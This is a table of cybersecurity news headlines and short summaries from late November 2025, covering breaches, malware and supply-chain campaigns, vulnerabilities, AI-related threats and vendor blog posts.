| DATE | NAME | Info | CATEGORY | WEB |
| --- | --- | --- | --- | --- |
| 30.11.25 | Man behind in-flight Evil Twin WiFi attacks gets 7 years in prison | A 44-year-old man was sentenced to seven years and four months in prison for operating an "evil twin" WiFi network to steal the data of unsuspecting travelers at various airports across Australia. | CyberCrime | |
| 30.11.25 | Public GitLab repositories exposed more than 17,000 secrets | After scanning all 5.6 million public repositories on GitLab Cloud, a security engineer discovered more than 17,000 exposed secrets across over 2,800 unique domains. | Incident | |
| 30.11.25 | French Football Federation discloses data breach after cyberattack | The French Football Federation (FFF) disclosed a data breach on Friday after attackers used a compromised account to gain access to administrative management software used by football clubs. | Incident | |
| 30.11.25 | Malicious LLMs empower inexperienced hackers with advanced tools | Unrestricted large language models (LLMs) like WormGPT 4 and KawaiiGPT are improving their capabilities to generate malicious code, delivering functional scripts for ransomware encryptors and lateral movement. | AI | |
| 30.11.25 | GreyNoise launches free scanner to check if you're part of a botnet | GreyNoise Labs has launched a free tool called GreyNoise IP Check that lets users check if their IP address has been observed in malicious scanning operations, like botnet and residential proxy networks. | Security | |
| 30.11.25 | OpenAI discloses API customer data breach via Mixpanel vendor hack | OpenAI is notifying some ChatGPT API customers that limited identifying information was exposed following a breach at its third-party analytics provider Mixpanel. | AI | |
| 30.11.25 | New ShadowV2 botnet malware used AWS outage as a test opportunity | A new Mirai-based botnet malware named 'ShadowV2' has been observed targeting IoT devices from D-Link, TP-Link, and other vendors with exploits for known vulnerabilities. | BotNet | |
| 30.11.25 | Popular Forge library gets fix for signature verification bypass flaw | A vulnerability in the 'node-forge' package, a popular JavaScript cryptography library, could be exploited to bypass signature verifications by crafting data that appears valid. | Vulnerability | |
| 30.11.25 | Comcast to pay $1.5M fine for vendor breach affecting 270K customers | Comcast will pay a $1.5 million fine to settle a Federal Communications Commission investigation into a February 2024 vendor data breach that exposed the personal information of nearly 275,000 customers. | Incident | |
| 30.11.25 | Multiple London councils' IT systems disrupted by cyberattack | The Royal Borough of Kensington and Chelsea (RBKC) and the Westminster City Council (WCC) announced that they are experiencing service disruptions following a cybersecurity issue. | Hack | |
| 30.11.25 | Microsoft: Security keys may prompt for PIN after recent updates | Microsoft warned users on Tuesday that FIDO2 security keys may prompt them to enter a PIN when signing in after installing Windows updates released since the September 2025 preview update. | OS | |
| 30.11.25 | Microsoft to secure Entra ID sign-ins from script injection attacks | Starting in mid-to-late October 2026, Microsoft will enhance the security of the Entra ID authentication system against external script injection attacks. | Hack | |
| 30.11.25 | ASUS warns of new critical auth bypass flaw in AiCloud routers | ASUS has released new firmware to patch nine security vulnerabilities, including a critical authentication bypass flaw in routers with AiCloud enabled. | Vulnerability | |
| 30.11.25 | OnSolve CodeRED cyberattack disrupts emergency alert systems nationwide | Risk management company Crisis24 has confirmed its OnSolve CodeRED platform suffered a cyberattack that disrupted emergency notification systems used by state and local governments, police departments, and fire agencies across the United States. | Cyber | |
| 30.11.25 | FBI: Cybercriminals stole $262M by impersonating bank support teams | The FBI warns of a surge in account takeover (ATO) fraud schemes and says that cybercriminals impersonating various financial institutions have stolen over $262 million in ATO attacks since the start of the year. | CyberCrime | |
| 30.11.25 | Tor switches to new Counter Galois Onion relay encryption algorithm | Tor has announced improved encryption and security for the circuit traffic by replacing the old tor1 relay encryption algorithm with a new design called Counter Galois Onion (CGO). | Security | |
| 30.11.25 | Code beautifiers expose credentials from banks, govt, tech orgs | Thousands of credentials, authentication keys, and configuration data impacting organizations in sensitive sectors have been sitting in publicly accessible JSON snippets submitted to the JSONFormatter and CodeBeautify online tools that format and structure code. | Security | |
| 30.11.25 | Dartmouth College confirms data breach after Clop extortion attack | Dartmouth College has disclosed a data breach after the Clop extortion gang leaked data allegedly stolen from the school's Oracle E-Business Suite servers on its dark web leak site. | Incident | |
| 29.11.25 | Malicious Blender model files deliver StealC infostealing malware | A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader. | Virus | |
| 29.11.25 | ClickFix attack uses fake Windows Update screen to push malware | New ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images. | Hack | |
| 29.11.25 | Real-estate finance services giant SitusAMC breach exposes client data | SitusAMC, a company that provides back-end services for top banks and lenders, disclosed on Saturday a data breach it had discovered earlier this month that impacted customer data. | Incident | |
| 29.11.25 | Shai-Hulud malware infects 500 npm packages, leaks secrets on GitHub | Hundreds of trojanized versions of well-known packages such as Zapier, ENS Domains, PostHog, and Postman have been planted in the npm registry in a new Shai-Hulud supply-chain campaign. | Virus | |
| 29.11.25 | Harvard University discloses data breach affecting alumni, donors | Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members. | Incident | |
| 29.11.25 | Microsoft to remove WINS support after Windows Server 2025 | Microsoft has warned IT administrators to prepare for the removal of Windows Internet Name Service (WINS) from Windows Server releases starting in November 2034. | OS | |
| 29.11.25 | Microsoft: Windows 11 24H2 bug crashes Explorer and Start Menu | Microsoft has confirmed a critical Windows 11 24H2 bug that causes the File Explorer, the Start Menu, and other key system components to crash when provisioning systems with cumulative updates released since July 2025. | OS | |
| 29.11.25 | Google enables Pixel-to-iPhone file sharing via Quick Share, AirDrop | Google has added interoperability support between Android Quick Share and Apple AirDrop, to let users share files between Pixel devices and iPhones. | OS | |
| 29.11.25 | Iberia discloses customer data leak after vendor security breach | Spanish flag carrier Iberia has begun notifying customers of a data security incident stemming from a compromise at one of its suppliers. The disclosure comes days after a threat actor claimed on hacker forums to have access to 77 GB of data allegedly stolen from the airline. | Incident | |
| 29.11.25 | WhatsApp API flaw let researchers scrape 3.5 billion accounts | Researchers compiled a list of 3.5 billion WhatsApp mobile phone numbers and associated personal information by abusing a contact-discovery API that lacked rate limiting. | Incident | |
| 29.11.25 | Cox Enterprises discloses Oracle E-Business Suite data breach | Cox Enterprises is notifying impacted individuals of a data breach that exposed their personal data to hackers who breached the company network after exploiting a zero-day flaw in Oracle E-Business Suite. | Incident | |
| 29.11.25 | Piecing Together the Puzzle: A Qilin Ransomware Investigation | Huntress analysts reconstructed a Qilin ransomware attack from a single endpoint, using limited logs to reveal rogue ScreenConnect access, failed infostealer attempts, and the ransomware execution path. The investigation shows how validating multiple data sources can uncover activity even when visibility is reduced to a "pinhole." | Ransom | |
| 29.11.25 | CISA warns Oracle Identity Manager RCE flaw is being actively exploited | The U.S. Cybersecurity & Infrastructure Security Agency (CISA) is warning government agencies to patch an Oracle Identity Manager vulnerability tracked as CVE-2025-61757 that has been exploited in attacks, potentially as a zero-day. | Vulnerability | |
| 29.11.25 | Nvidia confirms October Windows updates cause gaming issues | Nvidia has confirmed that last month's security updates are causing gaming performance issues on Windows 11 24H2 and Windows 11 25H2 systems. | OS | |
| 29.11.25 | Microsoft: Out-of-band update fixes Windows 11 hotpatch install loop | Microsoft has released an out-of-band cumulative update to fix a known issue causing the November 2025 KB5068966 hotpatch update to reinstall on Windows 11 systems repeatedly. | OS | |
| 29.11.25 | Grafana warns of max severity admin spoofing vulnerability | Grafana Labs is warning of a maximum severity vulnerability (CVE-2025-41115) in its Enterprise product that can be exploited to treat new users as administrators or for privilege escalation. | Vulnerability | |
| 29.11.25 | CrowdStrike catches insider feeding information to hackers | American cybersecurity firm CrowdStrike has confirmed that an insider shared screenshots taken on internal systems with hackers after they were leaked on Telegram by the Scattered Lapsus$ Hunters threat actors. | Hack | |
| 29.11.25 | FCC rolls back cybersecurity rules for telcos, despite state-hacking risks | The Federal Communications Commission (FCC) has rolled back a previous ruling that required U.S. telecom carriers to implement stricter cybersecurity measures following the massive hack from the Chinese threat group known as Salt Typhoon. | BigBrothers | |
| 29.11.25 | ShadowV2 Casts a Shadow Over IoT Devices - FortiGuard Labs | ShadowV2, a new Mirai-based botnet targeting IoT devices, surfaced during the recent AWS outage. FortiGuard Labs examines its propagation, DDoS capabilities, and global footprint. | BotNet blog | FORTINET |
| 29.11.25 | Cyberthreats Targeting the 2025 Holiday Season: What CISOs Need to Know | Cybercriminal activity is surging ahead of the 2025 holiday season. Deceptive domains, stolen accounts, and e-commerce attacks are accelerating. Here’s what leaders need to know. | Cyber blog | FORTINET |
| 29.11.25 | Beyond the Watering Hole: APT24's Pivot to Multi-Vector Attacks | Google Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by APT24, a People's Republic of China (PRC)-nexus threat actor. Spanning three years, APT24 has been deploying BADAUDIO, a highly obfuscated first-stage downloader used to establish persistent access to victim networks. | APT blog | Google Threat Intelligence |
| 29.11.25 | How attackers infiltrated the npm ecosystem, what Check Point researchers uncovered, and how organizations can | | Hacking blog | CHECKPOINT |
| 29.11.25 | Check Point researchers uncover a large-scale Android adware campaign that silently drains resources and disrupts ... | | Malware blog | CHECKPOINT |
| 29.11.25 | The Week in Vulnerabilities: Cyble Urges Fortinet, Microsoft Fixes | We look at 15 high-priority IT and ICS vulnerabilities, 7 of which are under discussion by threat actors on the dark web. | Vulnerability blog | Cyble |
| 29.11.25 | RelayNFC: The New NFC Relay Malware Targeting Brazil | CRIL uncovers RelayNFC, a malware leveraging Near-Field Communication (NFC) to intercept and relay contactless payment data. | Malware blog | Cyble |
| 29.11.25 | How Cyble is Empowering European Enterprises with AI-Powered Threat Intelligence | Europe’s cyber threat landscape is escalating fast, driven by ransomware, data leaks, and state-backed actors, marking 2025 as a decisive turning point. | AI blog | Cyble |
| 29.11.25 | Australia Releases 2025 Implementation Plan to Advance National Data and Digital Transformation | Australia’s 2025 Implementation Plan drives progress in AI, data, service delivery and cybersecurity to strengthen the nation’s digital future. | BigBrother blog | Cyble |
| 29.11.25 | The Week in Vulnerabilities: 3 Microsoft Flaws Among High-Priority Fixes | Cyble researchers tracked 971 vulnerabilities this week, with 60 rated critical. Key threats include a 9.8-severity Microsoft GDI+ heap buffer overflow, Firefox sandbox escape, QNAP SQL injection, and five CISA KEV additions. | Vulnerability blog | Cyble |
| 29.11.25 | Operation Hanoi Thief: Threat Actor targets Vietnamese IT professionals and recruitment teams. | Operation Hanoi Thief: Threat Actor targets Vietnamese IT professionals and recruitment teams. Introduction Key Targets. Industries Affected. Geographical Focus. Infection Chain. Initial Findings Looking into the decoy-document Technical Analysis Stage 1 – Malicious LNK Script Stage 2 – Pseudo-Polyglot... | APT blog | Seqrite |
| 29.11.25 | NORTH KOREAN CYBER CRIME AS A STATECRAFT TOOL | INTRODUCTION Russia’s March 2024 veto of the renewal of the UN Panel of Experts on North Korea ended 15 years of unanimous Security Council support for the sole independent | APT blog | Cyfirma |
| 29.11.25 | The Large-Scale AI-Powered Cyberattack : Strategic Assessment & Implications | Executive Summary In September 2025, the cybersecurity landscape crossed a pivotal threshold with the first widely verified case of an AI-powered, largely autonomous cyber- | AI blog | Cyfirma |
| 29.11.25 | CYFIRMA INDUSTRY REPORT : TELECOMMUNICATIONS & MEDIA | INTRODUCTION CYFIRMA’s ongoing threat monitoring has identified Tycoon 2FA as one of the most advanced and actively deployed Phishing-as-a-Service (PhaaS) platforms | Phishing blog | Cyfirma |
| 29.11.25 | Triofox Unauthenticated Access Control Vulnerability (CVE-2025-12480) | The SonicWall Capture Labs threat research team became aware of an Improper Access Control Vulnerability in Gladinet Triofox, assessed its impact, and developed mitigation measures. | Vulnerability blog | SonicWall |
| 29.11.25 | Underground Sharp Infostealer Dev Sells Modded Gremlin Source Code | The SonicWall Capture Labs Threat Research Team has recently been tracking infostealer malware stemming from the Sharp malware family. While analyzing a variant of Sharp infostealer, we came across a reference to a Telegram channel that leads to a person claiming to be the developer of this malware. | Malware blog | SonicWall |
| 29.11.25 | The Dual-Use Dilemma of AI: Malicious LLMs | A fundamental challenge with large language models (LLMs) in a security context is that their greatest strengths as defensive tools are precisely what enable their offensive power. | AI blog | Palo Alto |
| 29.11.25 | "Shai-Hulud" Worm Compromises npm Ecosystem in Supply Chain Attack (Updated November 26) | Unit 42 researchers investigated a renewed npm-focused compromise, in a campaign dubbed Shai-Hulud 2.0. This was first reported in early November 2025. | Malware blog | Palo Alto |
| 29.11.25 | The Golden Scale: 'Tis the Season for Unwanted Gifts | In October 2025, we published two Insights blogs on threat activity affiliated with the cybercriminal alliance known as Scattered LAPSUS$ Hunters (SLSH). After a few weeks of apparent inactivity, the threat actors have returned with a vengeance based on open-source reporting and conversations obtained from a new Telegram channel (scattered LAPSUS$ hunters part 7). | Hacking blog | Palo Alto |
| 29.11.25 | Care that you share | This holiday season, as teams run lean and cyber threats rise, being open with what — and how — you share can protect both information and relationships. | Cyber blog | CISCO TALOS |
| 29.11.25 | Bill Largent: On epic reads, lifelong learning, and empathy | Join Bill Largent as he shares his passion for learning, the connection between reading and empathy, and offers fresh insights for the next generation of security professionals. | Cyber blog | CISCO TALOS |
| 29.11.25 | Do robots dream of secure networking? Teaching cybersecurity to AI systems | This blog demonstrates a proof of concept using LangChain and OpenAI, integrated with Cisco Umbrella API, to provide AI agents with real-time threat intelligence for evaluating domain dispositions. | AI blog | CISCO TALOS |
| 29.11.25 | Dell ControlVault, Lasso, GL.iNet vulnerabilities | Cisco Talos’ Vulnerability Discovery & Research team recently disclosed five vulnerabilities in Dell ControlVault 3 firmware and its associated Windows software, four vulnerabilities in Entr'ouvert Lasso, and one vulnerability in GL.iNet Slate AX. The vulnerabilities men | Vulnerability blog | CISCO TALOS |
| 29.11.25 | This month in security with Tony Anscombe – November 2025 edition | Data exposure by top AI companies, the Akira ransomware haul, Operation Endgame against major malware families, and more of this month's cybersecurity news | Cyber blog | Eset |
| 29.11.25 | What parents should know to protect their children from doxxing | | Cyber blog | Eset |
| 29.11.25 | Influencers in the crosshairs: How cybercriminals are targeting content creators | | Cyber blog | Eset |
| 29.11.25 | MDR is the answer – now, what’s the question? | Why your business needs the best-of-breed combination of technology and human expertise | Cyber blog | Eset |
| 29.11.25 | Analysis of a Large-Scale DDoS Attack Against a Payment Processing Platform | On Saturday, September 13, 2025, a major Distributed Denial-of-Service (DDoS) attack targeted a European payment processing platform, prompting response and mitigation efforts by the F5 Security Operations Center (SOC). | Attack blog | F5 LABS |
| 29.11.25 | The State of Post-Quantum Cryptography (PQC) on the Web | We analyze the world’s most popular websites and most widely used web browsers to determine the current state of PQC adoption on the web. | Cyber blog | F5 LABS |
| 29.11.25 | Fallacy Failure Attack | Welcome to our AI Security Insights for November 2025. These insights are drawn from F5 Labs’ Comprehensive AI Security Index (CASI) and Agentic Resistance Scoring (ARS), which together provide rigorous, empirical measurement of model security and agentic attack resilience. | Attack blog | F5 LABS |
| 29.11.25 | Legacy Python Bootstrap Scripts Create Domain-Takeover Risk in Multiple PyPI Packages | Cybersecurity researchers have discovered vulnerable code in legacy Python packages that could potentially pave the way for a supply chain compromise on the Python Package Index | Hack | The Hacker News |
| 29.11.25 | North Korean Hackers Deploy 197 npm Packages to Spread Updated OtterCookie Malware | The North Korean threat actors behind the Contagious Interview campaign have continued to flood the npm registry with 197 more malicious packages since last month. According to | Virus | The Hacker News |
| 28.11.25 | MS Teams Guest Access Can Remove Defender Protection When Users Join External Tenants | Cybersecurity researchers have shed light on a cross-tenant blind spot that allows attackers to bypass Microsoft Defender for Office 365 protections via the guest access feature in | Security | The Hacker News |
| 28.11.25 | Bloody Wolf Expands Java-based NetSupport RAT Attacks in Kyrgyzstan and Uzbekistan | The threat actor known as Bloody Wolf has been attributed to a cyber attack campaign that has targeted Kyrgyzstan since at least June 2025 with the goal of delivering NetSupport RAT. | Virus | The Hacker News |
| 27.11.25 | Gainsight Expands Impacted Customer List Following Salesforce Security Alert | Gainsight has disclosed that the recent suspicious activity targeting its applications has affected more customers than previously thought. The company said Salesforce initially | CyberCrime | The Hacker News |
| 27.11.25 | Shai-Hulud v2 Spreads From npm to Maven, as Campaign Exposes Thousands of Secrets | The second wave of the Shai-Hulud supply chain attack has spilled over to the Maven ecosystem after compromising more than 830 packages in the npm registry. The Socket | CyberCrime | The Hacker News |
| 26.11.25 | Qilin Ransomware Turns South Korean MSP Breach Into 28-Victim 'Korean Leaks' Data Heist | South Korea's financial sector has been targeted by what has been described as a sophisticated supply chain attack that led to the deployment of Qilin ransomware. "This | Ransom | The Hacker News |
| 26.11.25 | Chrome Extension Caught Injecting Hidden Solana Transfer Fees Into Raydium Swaps | Cybersecurity researchers have discovered a new malicious extension on the Chrome Web Store that's capable of injecting a stealthy Solana transfer into a swap transaction and | Hack | The Hacker News |
| 26.11.25 | RomCom Uses SocGholish Fake Update Attacks to Deliver Mythic Agent Malware | The threat actors behind a malware family known as RomCom targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent. | Virus | The Hacker News |
| 26.11.25 | FBI Reports $262M in ATO Fraud as Researchers Cite Growing AI Phishing and Holiday Scams | The U.S. Federal Bureau of Investigation (FBI) has warned that cybercriminals are impersonating financial institutions with an aim to steal money or sensitive information to | AI | The Hacker News |
| 25.11.25 | JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers | Cybersecurity researchers are calling attention to a new campaign that's leveraging a combination of ClickFix lures and fake adult websites to deceive users into running malicious | Virus | The Hacker News |
| 25.11.25 | ToddyCat's New Hacking Tools Steal Outlook Emails and Microsoft 365 Access Tokens | The threat actor known as ToddyCat has been observed adopting new methods to obtain access to corporate email data belonging to target companies, including using a custom tool | Hack | The Hacker News |
| 25.11.25 | Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware | Cybersecurity researchers have disclosed details of a new campaign that has leveraged Blender Foundation files to deliver an information stealer known as StealC V2. "This ongoing operation, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader," Morphisec researcher Shmuel Uzan said in a report shared with The Hacker News. | Virus | The Hacker News |
| 25.11.25 | CISA Warns of Active Spyware Campaigns Hijacking High-Value Signal and WhatsApp Users | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday issued an alert warning of bad actors actively leveraging commercial spyware and remote access trojans | CyberCrime | The Hacker News |
| 24.11.25 | New Fluent Bit Flaws Expose Cloud to RCE and Stealthy Infrastructure Intrusions | Cybersecurity researchers have discovered five vulnerabilities in Fluent Bit, an open-source and lightweight telemetry agent, that could be chained to compromise and take over cloud | Vulnerability | The Hacker News |
| 24.11.25 | Second Sha1-Hulud Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft | Multiple security vendors are sounding the alarm about a second wave of attacks targeting the npm registry in a manner that's reminiscent of the Shai-Hulud attack. The new supply | CyberCrime | The Hacker News |
| 24.11.25 | ⚡ Weekly Recap: Fortinet Exploit, Chrome 0-Day, BadIIS Malware, Record DDoS, SaaS Breach & More | This week saw a lot of new cyber trouble. Hackers hit Fortinet and Chrome with new 0-day bugs. They also broke into supply chains and SaaS tools. Many hid inside trusted apps, browser alerts, and software updates. Big firms like Microsoft, Salesforce, and Google had to react fast — stopping DDoS attacks, blocking bad links, and fixing live flaws. | Cyber | The Hacker News |
| 24.11.25 | Chinese DeepSeek-R1 AI Generates Insecure Code When Prompts Mention Tibet or Uyghurs | New research from CrowdStrike has revealed that DeepSeek's artificial intelligence (AI) reasoning model DeepSeek-R1 produces more security vulnerabilities in response to prompts | AI | The Hacker News |
| 24.11.25 | ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access | A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute malware known as ShadowPad. "The attacker | Virus | The Hacker News |
| 23.11.25 | China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services | The China-linked advanced persistent threat (APT) group known as APT31 has been attributed to cyber attacks targeting the Russian information technology (IT) sector between | APT | The Hacker News |
| 23.11.25 | 'Scattered Spider' teens plead not guilty to UK transport hack | Two British teenagers have denied charges related to an investigation into the breach of Transport for London (TfL) in August 2024, which caused millions of pounds in damage and exposed customer data. | Hack | |
| 23.11.25 | Avast Makes AI-Driven Scam Defense Available for Free Worldwide | Avast is rolling out Scam Guardian, a free AI-powered protection layer that analyzes websites, messages, and links to detect rising scam threats. Powered by Gen Threat Labs data, it reveals hidden dangers in code and adds 24/7 scam guidance through the Avast Assistant. | Safety | |
| 23.11.25 | Google exposes BadAudio malware used in APT24 espionage campaigns | China-linked APT24 hackers have been using a previously undocumented malware called BadAudio in a three-year espionage campaign that recently switched to more sophisticated attack methods. | APT | |
| 23.11.25 | Hacker claims to steal 2.3TB data from Italian rail group, Almaviva | Data from Italy's national railway operator, the FS Italiane Group, has been exposed after a threat actor breached the organization's IT services provider, Almaviva. | Incident | |
| 23.11.25 | GlobalProtect VPN portals probed with 2.3 million scan sessions | A major spike in malicious scanning against Palo Alto Networks GlobalProtect portals has been detected, starting on November 14, 2025. | Safety | |
| 23.11.25 | Salesforce investigates customer data theft via Gainsight breach | Salesforce says it revoked refresh tokens linked to Gainsight-published applications while investigating a new wave of data theft attacks targeting customers. | Incident | |
| 23.11.25 | New SonicWall SonicOS flaw allows hackers to crash firewalls | American cybersecurity company SonicWall urged customers today to patch a high-severity SonicOS SSLVPN security flaw that can allow attackers to crash vulnerable firewalls. | Vulnerability | |
| 23.11.25 | D-Link warns of new RCE flaws in end-of-life DIR-878 routers | D-Link is warning of three remotely exploitable command execution vulnerabilities that affect all models and hardware revisions of its DIR-878 router, which has reached end-of-service but is still available in several markets. | Vulnerability | |
| 23.11.25 | Turn your Windows 11 migration into a security opportunity | Windows 11 migration is inevitable as Windows 10 support ends, and unsupported systems create major security and ransomware risks. Acronis explains how to use this migration to review backups, strengthen cybersecurity, and ensure data stays recoverable. | OS | |
| 23.11.25 | TV streaming piracy service with 26M yearly visits shut down | Photocall, a TV piracy streaming platform with over 26 million users annually, has ceased operations following a joint investigation by the Alliance for Creativity and Entertainment (ACE) and DAZN. | Cyber | |
| 23.11.25 | Crypto mixer founders sent to prison for laundering over $237 million | The founders of the Samourai Wallet (Samourai) cryptocurrency mixing service have been sent to prison for helping criminals launder over $237 million. | Cryptocurrency | |
| 23.11.25 | Multi-threat Android malware Sturnus steals Signal, WhatsApp messages | A new Android banking trojan named Sturnus can capture communication from end-to-end encrypted messaging platforms like Signal, WhatsApp, and Telegram, as well as take complete control of the device. | Virus | |
| 23.11.25 | Sneaky2FA PhaaS kit now uses redteamers' Browser-in-the-Browser attack | Sneaky2FA, a phishing-as-a-service (PhaaS) kit popular among cybercriminals, has added Browser-in-the-Browser (BitB) capabilities, giving "customers" the option to launch highly deceptive attacks. | Phishing | BleepingComputer |
| 23.11.25 | W3 Total Cache WordPress plugin vulnerable to PHP command injection | A critical flaw in the W3 Total Cache (W3TC) WordPress plugin can be exploited to run PHP commands on the server by posting a comment that contains a malicious payload. | Hack | |
| 23.11.25 | Russian bulletproof hosting provider sanctioned over ransomware ties | Today, the United States, the United Kingdom, and Australia announced sanctions targeting Russian bulletproof hosting (BPH) providers that have supported ransomware gangs and other cybercrime operations. | Ransom | |
| 23.11.25 | New WrtHug campaign hijacks thousands of end-of-life ASUS routers | Thousands of ASUS WRT routers, mostly end-of-life or outdated devices, have been hijacked in a global campaign called Operation WrtHug that exploits six vulnerabilities. | Hack | |
| 23.11.25 | The hidden risks in your DevOps stack data—and how to address them | DevOps repos on GitHub, GitLab, Bitbucket, and Azure DevOps face risks from weak access controls, misconfigurations, outages, and accidental deletions. GitProtect provides automated, immutable backups and fast recovery to secure your DevOps data. | Cyber | |
| 22.11.25 | CISA gives govt agencies 7 days to patch new Fortinet flaw | CISA has ordered U.S. government agencies to secure their systems within a week against another vulnerability in Fortinet's FortiWeb web application firewall, which was exploited in zero-day attacks. | Vulnerability | |
| 22.11.25 | Meet ShinySp1d3r: New Ransomware-as-a-Service created by ShinyHunters | An in-development build of the upcoming ShinySp1d3r ransomware-as-a-service platform has surfaced, offering a preview of the upcoming extortion operation. | Ransom | |
| 22.11.25 | California man admits to laundering crypto stolen in $230M heist | A 45-year-old from Irvine, California, has pleaded guilty to laundering at least $25 million stolen in a massive $230 million cryptocurrency heist. | Cryptocurrency | |
| 22.11.25 | Cloudflare blames this week's massive outage on database issues | On Tuesday, Cloudflare experienced its worst outage in 6 years, blocking access to many websites and online platforms for almost 6 hours after a change to database access controls triggered a cascading failure across its Global Network. | Cyber | |
| 22.11.25 | ‘PlushDaemon’ hackers hijack software updates in supply-chain attacks | The China-aligned advanced persistent threat (APT) tracked as 'PlushDaemon' is hijacking software update traffic to deliver malicious payloads to its targets. | APT | |
| 22.11.25 | New ShadowRay attacks convert Ray clusters into crypto miners | A global campaign dubbed ShadowRay 2.0 hijacks exposed Ray Clusters by exploiting an old code execution flaw to turn them into a self-propagating cryptomining botnet. | Cryptocurrency | |
| 22.11.25 | Windows 11 gets new Cloud Rebuild, Point-in-Time Restore tools | Microsoft announced two new Windows 11 recovery features today at the Ignite developer conference, called Cloud Rebuild and Point-in-Time Restore (PITR), that aim to reduce downtime and make it easier to recover from system failures or faulty updates. | OS | |
| 22.11.25 | Fortinet warns of new FortiWeb zero-day exploited in attacks | Today, Fortinet released security updates to patch a new FortiWeb zero-day vulnerability that threat actors are actively exploiting in attacks. | Exploit | |
| 22.11.25 | Microsoft to integrate Sysmon directly into Windows 11, Server 2025 | Microsoft announced today that it will integrate Sysmon natively into Windows 11 and Windows Server 2025 next year, making it unnecessary to deploy the standalone Sysinternals tool. | OS | BleepingComputer |
| 22.11.25 | Microsoft Teams to let users report messages wrongly flagged as threats | Microsoft says that Teams users will be able to report false-positive threat alerts triggered by messages incorrectly flagged as malicious. | OS | |
| 22.11.25 | French agency Pajemploi reports data breach affecting 1.2M people | Pajemploi, the French social security service for parents and home-based childcare providers, has suffered a data breach that may have exposed personal information of 1.2 million individuals. | Incident | |
| 22.11.25 | Attackers Now Bypass App-Based MFA, Hardware Biometrics Stop Them | Tycoon 2FA enables turnkey real-time MFA relays behind 64,000+ attacks this year, proving legacy MFA collapses the moment a phishing kit targets it. Learn from Token Ring how biometric, phishing-proof FIDO2 hardware blocks these relay attacks before they succeed. | Phishing | |
| 22.11.25 | Cloudflare hit by outage affecting Global Network services | Cloudflare is investigating an outage affecting its global network services, with users encountering "internal server error" messages when attempting to access affected websites and online platforms. | Cyber | BleepingComputer |
| 22.11.25 | Matrix Push C2 Uses Browser Notifications for Fileless, Cross-Platform Phishing Attacks | Bad actors are leveraging browser notifications as a vector for phishing attacks to distribute malicious links by means of a new command-and-control (C2) platform called Matrix Push | Phishing | The Hacker News |
| 22.11.25 | CISA Warns of Actively Exploited Critical Oracle Identity Manager Zero-Day Vulnerability | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw impacting Oracle Identity Manager to its Known Exploited Vulnerabilities (KEV) | Vulnerability | The Hacker News |
| 22.11.25 | Arms Race: AI's Impact on Cybersecurity | New whitepaper explores how both attackers and defenders are using the latest AI technologies to achieve their goals. | AI blog | SECURITY.COM |
| 22.11.25 | Unwanted Gifts: Major Campaign Lures Targets with Fake Party Invites | Prolific threat actor delivering RMM packages using variety of lures, including seasonal party invites | Cyber blog | SECURITY.COM |
| 22.11.25 | | Another campaign targeting WhatsApp users in Brazil spreads like a worm and employs multiple payloads for credential theft, session hijacking, and persistence | Social blog | SOPHOS |
| 22.11.25 | CISA’s New Guidance on Bulletproof Hosting: Why It Matters and What Comes Next | The Cybersecurity and Infrastructure Security Agency (CISA) is the U.S. government agency responsible for protecting the nation’s critical infrastructure from cyber and physical threats. CISA works with public and private sector partners to improve resilience, share threat intelligence, and coordinate national-level cyber defense efforts. | Cyber blog | Silent Push |
| 22.11.25 | How Preemptive Cyber Defence Supports the UK's ACD Strategy | UK organisations are expanding their digital footprint, but reliance on reactive security is leaving them exposed. To align with the NCSC’s Active Cyber Defence (ACD) strategy, teams must shift to preemptive defence. | Cyber blog | Silent Push |
| 22.11.25 | | Based on recent analysis of the broader threat landscape, Google Threat Intelligence Group (GTIG) has identified a shift that occurred within the last year: adversaries are no longer leveraging artificial intelligence (AI) just for productivity gains, they are deploying novel AI-enabled malware in active operations. This marks a new operational phase of AI abuse, involving tools that dynamically alter behavior mid-execution. | AI blog | Google Threat Intelligence |
| 22.11.25 | | Google Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by APT24, a People's Republic of China (PRC)-nexus threat actor. Spanning three years, APT24 has been deploying BADAUDIO, a highly obfuscated first-stage downloader used to establish persistent access to victim networks. | APT blog | Google Threat Intelligence |
| 22.11.25 | | The global appetite for GLP-1 medications like Ozempic, Wegovy and Mounjaro have created something far ... | AI blog | CHECKPOINT |
| 22.11.25 | | Key findings Malicious activity is rising, with 1 in 11 newly registered Black Friday themed ... | Cyber blog | CHECKPOINT |
| 22.11.25 | Australia Releases 2025 Implementation Plan to Advance National Data and Digital Transformation | Australia’s 2025 Implementation Plan drives progress in AI, data, service delivery and cybersecurity to strengthen the nation’s digital future. | Cyber blog | Cyble |
| 22.11.25 | The Week in Vulnerabilities: 3 Microsoft Flaws Among High-Priority Fixes | Cyble researchers tracked 971 vulnerabilities this week, with 60 rated critical. Key threats include a 9.8-severity Microsoft GDI+ heap buffer overflow, Firefox sandbox escape, QNAP SQL injection, and five CISA KEV additions. | Vulnerability blog | Cyble |
| 22.11.25 | Tycoon 2FA: A Technical Analysis of its Adversary-in-the-Middle Phishing Operation | CYFIRMA's ongoing threat monitoring has identified Tycoon 2FA as one of the most advanced and actively deployed Phishing-as-a-Service (PhaaS) platforms | Phishing blog | Cyfirma |
| 22.11.25 | Rising Cybercrime During Black Friday & Cyber Monday : A 2025 Threat Intelligence Report | As the festive shopping season approaches, Black Friday and Cyber Monday bring a significant surge in online sales and, with it, a sharp increase in | Cyber blog | Cyfirma |
